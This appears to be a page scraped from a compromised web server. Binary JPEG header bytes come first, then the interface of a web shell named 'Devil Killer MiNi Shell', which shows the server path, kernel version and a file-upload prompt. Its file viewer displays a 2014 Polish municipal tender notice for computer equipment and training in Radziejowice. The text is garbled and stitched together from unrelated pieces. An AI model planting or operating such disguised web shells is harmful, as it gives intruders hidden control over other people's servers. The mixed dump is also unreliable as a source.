JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141006/210889-N-2014.html

<p class="kh_header"><b>Radziejowice: Dostawa sprzętu komputerowego wraz z oprogramowaniem, przeprowadzenie szkoleń w zakresie obsługi komputera oraz serwis dostarczonego sprzętu</b><br>
<b>Numer ogłoszenia: 210889 - 2014; data zamieszczenia: 06.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radziejowice , ul. Kubickiego 10, 96-325 Radziejowice, woj. mazowieckie, tel. 46 8577171, faks 46 8577120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.radziejowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego wraz z oprogramowaniem, przeprowadzenie szkoleń w zakresie obsługi komputera oraz serwis dostarczonego sprzętu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <P>1.	Przedmiotem zamówienia jest:
<P>a)	dostawa 105 szt. komputerów stacjonarnych wraz z wymaganym oprogramowaniem do wskazanych przez Zamawiającego gospodarstw domowych zlokalizowanych na terenie gminy Radziejowice, instalacja oraz konfiguracja,
<P>b)	dostawa 95 szt. laptopów wraz z wymaganym oprogramowaniem do wskazanych przez Zamawiającego jednostek sektora publicznego Gminy Radziejowice, instalacja oraz konfiguracja,
<P>c)	usługa szkolenia użytkowników dostarczonego sprzętu, o którym mowa w lit. a) powyżej, w zakresie niezbędnym dla przekazania wiedzy w celu jego należytego używania, w tym obsługi komputera, programów biurowych, Internetu (105 osób - 6 grup - łącznie 108 godzin szkolenia),
<P>d)	usługa serwisu dostarczonego sprzętu komputerowego (gotowość serwisu plus minimum jeden serwis w miejscu użytkowania komputera stacjonarnego / laptopa), obejmująca podejmowanie działań niezbędnych do utrzymania w sprawności sprzętu i zainstalowanego na nim oprogramowania w zakresie wykraczającym poza gwarancję.
<P>2.	Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 7 do siwz (Szczegółowy opis przedmiotu zamówienia).
<P>3.	Wybrany wykonawca, w terminie 14 dni od dnia podpisania umowy z zamawiającym, zobowiązany będzie, w uzgodnieniu z zamawiającym, opracować i uzyskać akceptację harmonogramu realizacji całego zamówienia. 
<P>4.	Wymagania ogólne dotyczące dostaw:
<P>a)	Wykonawca zobowiązany jest dostarczyć rzeczy oraz wykonać wszelkie czynności określone w szczegółowym opisie przedmiotu zamówienia (załącznik nr 7 do siwz).
<P>b)	Wykonawca zobowiązany jest wypełnić załącznik nr 7 (szczegółowy opis przedmiotu zamówienia) w zakresie podania szczegółowych parametrów technicznych oferowanego sprzętu.
<P>c)	Dostawy sprzętu komputerowego muszą odbywać się sukcesywnie zgodnie z zatwierdzonym harmonogramem. Dostawy do jednostek sektora publicznego muszą się odbywać w dni robocze od poniedziałku do piątku w godz. 8.00-16.00. Dostawy do odbiorców prywatnych (beneficjentów ostatecznych) muszą się odbywać wg indywidualnych ustaleń z danym odbiorcą po uzgodnieniu terminu z zamawiającym.
<P>d)	Wykonawca dokona instalacji, konfiguracji sprzętu komputerowego wraz z wymaganym oprogramowaniem biurowym i antywirusowym u beneficjenta ostatecznego (pod wskazanym adresem przez zamawiającego) tak, aby był on gotowy do pracy po przekazaniu beneficjentowi ostatecznemu i aby nie była konieczna ingerencja beneficjenta ostatecznego.
<P>e)	Wszystkie urządzenia muszą posiadać aktualne certyfikaty oraz spełniać obowiązujące standardy - szczegółowe wymagania w tym zakresie zawarte są w załączniku nr 7 do siwz oraz w rozdz. VII siwz. 
<P>f)	Wszystkie urządzenia muszą być wyprodukowane w 2014r., muszą być fabrycznie nowe i wolne od obciążeń prawami osób trzecich.
<P>g)	Wszystkie urządzenia muszą posiadać dołączone niezbędne instrukcje i materiały dotyczące użytkowania w języku polskim.
<P>h)	Do wszystkich urządzeń należy dołączyć wszelkie kable niezbędne do ich prawidłowego użytkowania.
<P>5.	Wymagania ogólne dotyczące szkolenia:
<P>a)	Szczegółowy zakres szkolenia, w tym wymagania dotyczące organizacji zawarte są w załączniku nr 7 do siwz.
<P>b)	Zajęcia w ramach szkolenia będą się odbywały od 2 do 4 razy w tygodniu w dni robocze od poniedziałku do piątku w godzinach od 17.00 do 21.00, a w soboty w godzinach od 9.00 do 14.00. Jednorazowo nie więcej niż po 3 godz. lekcyjne (1 godzina lekcyjna = 45 minut) plus 15 minut przerwy łącznie w ciągu jednego spotkania.
<P>c)	Osoby objęte szkoleniem zostaną wskazane przez zamawiającego. Są to tzw. beneficjenci ostateczni, którzy zostaną wyposażeni w komputery stacjonarne stanowiące przedmiot dostawy.
<P>d)	Wszystkie zajęcia realizowane w ramach niniejszego zamówienia muszą się odbywać w salach szkoleniowych, którymi dysponuje zamawiający. Sale zlokalizowane są w miejscowościach Radziejowice oraz Korytów A.
<P>e)	Zajęcia teoretyczno-praktyczne muszą być prowadzone przez wykwalifikowaną kadrę wykładowców posiadającą odpowiednie doświadczenie. Zamawiający zastrzega sobie prawo do kontroli osób prowadzących szkolenia i przekazywania uwag w razie nienależytego wykonywania usług szkolenia.
<P>f)	Wykonawca musi posiadać lub mieć możliwość dysponowania odpowiednią kadrą wykładowców aby w terminie wskazanym w rozdz. V siwz zdążyć przeszkolić skierowane przez zamawiającego osoby.
<P>g)	Wykonawca zobowiązany będzie prowadzić dokumentację przebiegu szkolenia zgodnie z wymaganiami zamawiającego, tj. m.in. prowadzić listę obecności oraz dziennik zajęć.
<P>h)	Szkolenie musi mieć opiekuna z ramienia wykonawcy, czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz zamawiającym.
<P>i)	Wykonawca każdorazowo poinformuje uczestników szkoleń o współfinansowaniu projektu ze środków UE Zakup współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007-2013.
<P>j)	Wykonawca zobowiązany będzie ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem.
<P>k)	Wykonawca zobowiązany będzie do stosowania ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz.U. z 2014r., poz. 1182 j.t.) zarówno w trakcie realizacji przedmiotu zamówienia jak również po jego zakończeniu.
<P>6.	Wymagania ogólne serwisowe: 
<P>a)	Szczegółowy zakres usług serwisowych oraz wymagania względem wykonawcy zawarte są w załączniku nr 7 do siwz.
<P>b)	Zamawiający wymaga aby wykonawca zapewnił gotowość serwisową od momentu przekazania sprzętu komputerowego stanowiącego przedmiot niniejszego zamówienia do dnia 30 września 2015r.
<P>c)	Ponadto w ramach usługi serwisowej wykonawca zobowiązuje się dokonać przynajmniej 1 przeglądu serwisowego na każdym stanowisku komputerowym w okresie styczeń-czerwiec 2015r.
<P>d)	Wymagane jest aby serwis świadczony był w miejscu użytkowania sprzętu. 
<P>e)	Wykonawca ma obowiązek przyjmowania zgłoszeń serwisowych przez faks lub e-mail. Wykonawca ma udostępnić pojedynczy punkt przyjmowania zgłoszeń dla wszystkich dostarczanych urządzeń. Zgłoszenia będą przekazywane wyłącznie przez przedstawiciela zamawiającego.
<P>f)	Zamawiający zgłaszać będzie do wykonawcy awarie w dni robocze w godzinach 8.00-16.00 w następujący sposób: faksem lub pocztą elektroniczną. 
<P>7.	Wymagania dotyczące oferowanych dostaw i usług:
<P>a)	Wykonawca sporządza i załącza do oferty specyfikację techniczną oferowanego sprzętu, przy czym parametry techniczne, okresy gwarancji czy inne parametry określone w specyfikacji technicznej sprzętu komputerowego i pozostałych urządzeń stanowią wymagania minimalne, które musi spełniać oferowany sprzęt. Wykonawca może zaoferować lepsze parametry sprzętu.
<P>b)	W przypadku, gdy parametry oferowanego sprzętu są tożsame z wymienionymi w specyfikacji technicznej sprzętu komputerowego i pozostałych urządzeń wówczas wykonawca może załączyć do oferty podpisaną specyfikację techniczną sprzętu załączoną do siwz.
<P>8.	Rozwiązania równoważne: 
<P>a)	Podane w opisach przedmiotu zamówienia parametry nie mają na celu naruszenie art. 7 oraz art. 29 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. 
<P>b)	Wszystkie wskazania należy rozumieć jako określenie minimalnych wymagań parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych zamawiający dopuszcza stosowanie materiałów i urządzeń równoważnych. 
<P>c)	Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu technologicznego, wydajnościowego i funkcjonalnego, przy czym równoważność oferowanych materiałów i urządzeń w stosunku do wskazanych w dokumentach przetargowych winien potwierdzić zamawiający. 
<P>d)	Dodatkowe szczegółowe informacje dotyczące spełniania zasad równoważności w stosunku do wymagań określonych w opisie przedmiotu zamówienia zawarte są w szczegółowym opisie przedmiotu zamówienia (załącznik nr 7 do siwz)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.00.00-0, 30.21.30.00-5, 30.23.13.00-0, 30.21.31.00-6, 30.23.60.00-2, 48.00.00.00-8, 48.62.40.00-8, 80.53.30.00-9, 50.31.20.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> <P>1.	Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 15000 zł, słownie: piętnaście tysięcy złotych. 
<P>2.	Wadium może być wnoszone w jednej lub kilku formach przewidzianych w ustawie Pzp. 
<P>3.	Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek zamawiającego: 
<P>Bank Spółdzielczy w Mszczonowie, Oddział Radziejowice.
<P>Nr rachunku: 97 9302 1014 3900 0909 2000 0020.
<P>Do oferty należy dołączyć oryginał lub kopię przelewu potwierdzoną za zgodność z oryginałem. 
<P>4.	Wadium wniesione w innej formie niż pieniężnej należy dołączyć do oferty w postaci oryginału. 
<P>5.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas, gdy zamawiający otrzyma taki przelew przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><P>Zamawiający nie określa szczegółowych wymagań dotyczących spełnienia ww. warunku.

<P>Na potwierdzenie spełniania ww. warunku zamawiający żąda złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z zał. nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><P>a)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali w sposób należyty co najmniej jedną dostawę polegającą na dostawie min. 50 szt. komputerów stacjonarnych (PC).
<P>b)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali w sposób należyty co najmniej jedną dostawę polegającą na dostawie min. 50 szt. komputerów przenośnych (laptopów).
<P>c)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali w sposób należyty co najmniej jedną usługę polegającą na przeszkoleniu min. 50 osób w zakresie podstawowej obsługi komputera.
<P>Ocena spełniania ww. warunków zostanie dokonana metodą spełnia - nie spełnia na podstawie przedłożonych przez wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><P>Zamawiający nie określa szczegółowych wymagań dotyczących spełnienia ww. warunku.

<P>Na potwierdzenie spełniania ww. warunku zamawiający żąda złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z zał. nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><P>Zamawiający nie określa szczegółowych wymagań dotyczących spełnienia ww. warunku.

<P>Na potwierdzenie spełniania ww. warunku zamawiający żąda złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z zał. nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><P>a)	Wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej: 200.000,00 zł (słownie: dwieście tysięcy złotych). 
<P>b)	Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości nie mniejszej niż 200.000,00 zł (słownie: dwieście tysięcy złotych). 
Ocena spełniania ww. warunków zostanie dokonana metodą spełnia - nie spełnia na podstawie przedłożonych przez wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br><P>Obowiązek wskazania przez wykonawcę w wykazie dostaw i usług oraz złożenia poświadczeń dotyczy dostaw i usług określonych w pkt III.3.2) ogłoszenia, tj. wskazania:
<P>-	co najmniej jednej dostawy polegającej na dostawie min 50 szt. komputerów stacjonarnych (PC),
<P>-	co najmniej jednej dostawy polegającej na dostawie min 50 szt. komputerów przenośnych (laptopów),
<P>-	co najmniej jednej usługi polegającej na przeszkoleniu min. 50 osób w zakresie podstawowej obsługi komputera.;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
